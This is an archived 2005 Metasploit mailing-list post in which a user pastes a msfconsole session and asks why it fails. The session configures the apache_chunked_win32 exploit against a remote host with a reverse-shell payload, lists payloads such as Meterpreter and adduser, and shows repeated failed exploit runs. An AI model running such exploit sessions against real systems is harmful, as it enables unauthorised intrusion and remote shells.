Metasploit mailing list archives
re: Apache Exploit : Errors
From: cesedo at logiciel-inc.com (Cyril Esedo)
Date: Tue, 26 Apr 2005 11:59:17 -0700
hi HD, thanks for your prompt reply, i have included the whole snapshot of what i did to this mail, where did i go wrong? ??????????????? __.?????????????????????? .__.??????? .__. __. ? _____?? _____/? |______??? ____________ |? |?? ____ |__|/? |_ ?/???? \_/ __ \?? __\__? \? /? ___/\____ \|? |? /? _ \|? \?? __\ |? Y Y? \? ___/|? |? / __ \_\___ \ |? |_> >? |_(? <_> )? ||? | |__|_|? /\___? >__| (____? /____? >|?? __/|____/\____/|__||__| ????? \/???? \/????????? \/???? \/ |__| + -- --=[ msfconsole v2.3 [46 exploits - 68 payloads] msf > use aqpache_chunked_win32 msfconsole: use: please specify a valid exploit name msf > use apache_chunked_win32 msf apache_chunked_win32 > show options Exploit Options =============== ? Exploit:??? Name????? Default??? Description ? --------??? ------??? -------??? ------------------ ? optional??? SSL????????????????? Use SSL ? required??? RHOST??????????????? The target address ? required??? RPORT???? 80???????? The target port ? Target: Windows NT/2K Bruteforce msf apache_chunked_win32 > set RPORT 443 RPORT -> 443 msf apache_chunked_win32 > set RHOST 80.x.x.x RHOST -> 80.x.x.x msf apache_chunked_win32 > set SSL 1 SSL -> 1 msf apache_chunked_win32 > show options Exploit Options =============== ? Exploit:??? Name????? Default???????? Description ? --------??? ------??? ------------??? ------------------ ? optional??? SSL?????? 1?????????????? Use SSL ? required??? RHOST???? 80.x.x.x??? The target address ? required??? RPORT???? 443???????????? The target port ? Target: Windows NT/2K Bruteforce msf apache_chunked_win32 > show targets Supported Exploit Targets ========================= ?? 0? Windows NT/2K Bruteforce ?? 1? Windows 2000 ?? 2? Windows NT msf apache_chunked_win32 > set TARGET 2 TARGET -> 2 msf apache_chunked_win32 > show payloads Metasploit Framework Usable Payloads ==================================== ? win32_adduser??????????????? Windows Execute net user /ADD ? win32_bind?????????????????? Windows Bind Shell ? win32_bind_dllinject???????? Windows Bind DLL Inject ? win32_bind_meterpreter?????? Windows Bind Meterpreter DLL Inject ? win32_bind_stg?????????????? Windows Staged Bind Shell ? win32_bind_stg_upexec??????? Windows Staged Bind Upload/Execute ? win32_bind_vncinject???????? Windows Bind VNC Server DLL Inject ? win32_exec?????????????????? Windows Execute Command ? win32_reverse??????????????? Windows Reverse Shell ? win32_reverse_dllinject????? Windows Reverse DLL Inject ? win32_reverse_meterpreter??? Windows Reverse Meterpreter DLL Inject ? win32_reverse_stg??????????? Windows Staged Reverse Shell ? win32_reverse_stg_upexec???? Windows Staged Reverse Upload/Execute ? win32_reverse_vncinject????? Windows Reverse VNC Server Inject msf apache_chunked_win32 > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf apache_chunked_win32(win32_reverse) > show options Exploit and Payload Options =========================== ? Exploit:??? Name????? Default???????? Description ? --------??? ------??? ------------??? ------------------ ? optional??? SSL?????? 1?????????????? Use SSL ? required??? RHOST???? 80.x.x.x?? The target address ? required??? RPORT???? 443???????????? The target port ? Payload:??? Name??????? Default??? Description ? --------??? --------??? -------??? ------------------------------------------ ? required??? EXITFUNC??? seh??????? Exit technique: "process", "thread", "seh" ? required??? LHOST????????????????? Local address to receive connection ? required??? LPORT?????? 4321?????? Local port to receive connection ? Target: Windows NT msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.0.123 LHOST -> 192.168.0.123 msf apache_chunked_win32(win32_reverse) > exploit 80.x.x.x [*] Starting Reverse Handler. [*] Error creating socket: Connection failed: Operation now in progress [*] Exiting Reverse Handler. msf apache_chunked_win32(win32_reverse) > exploit 80.x.x.x [*] Starting Reverse Handler. [*] Error creating socket: Connection failed: Operation now in progress [*] Exiting Reverse Handler. msf apache_chunked_win32(win32_reverse) > exploit 80.x.x.x [*] Starting Reverse Handler. [*] Error creating socket: Connection failed: Operation now in progress [*] Exiting Reverse Handler. msf apache_chunked_win32(win32_reverse) > thanks - C -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20050426/d747c522/attachment.htm>
Current thread:
- re: Apache Exploit : Errors Cyril Esedo (Apr 26)
- re: Apache Exploit : Errors Dunceor . (Apr 27)
- re: Apache Exploit : Errors Bernd Streppel (Apr 27)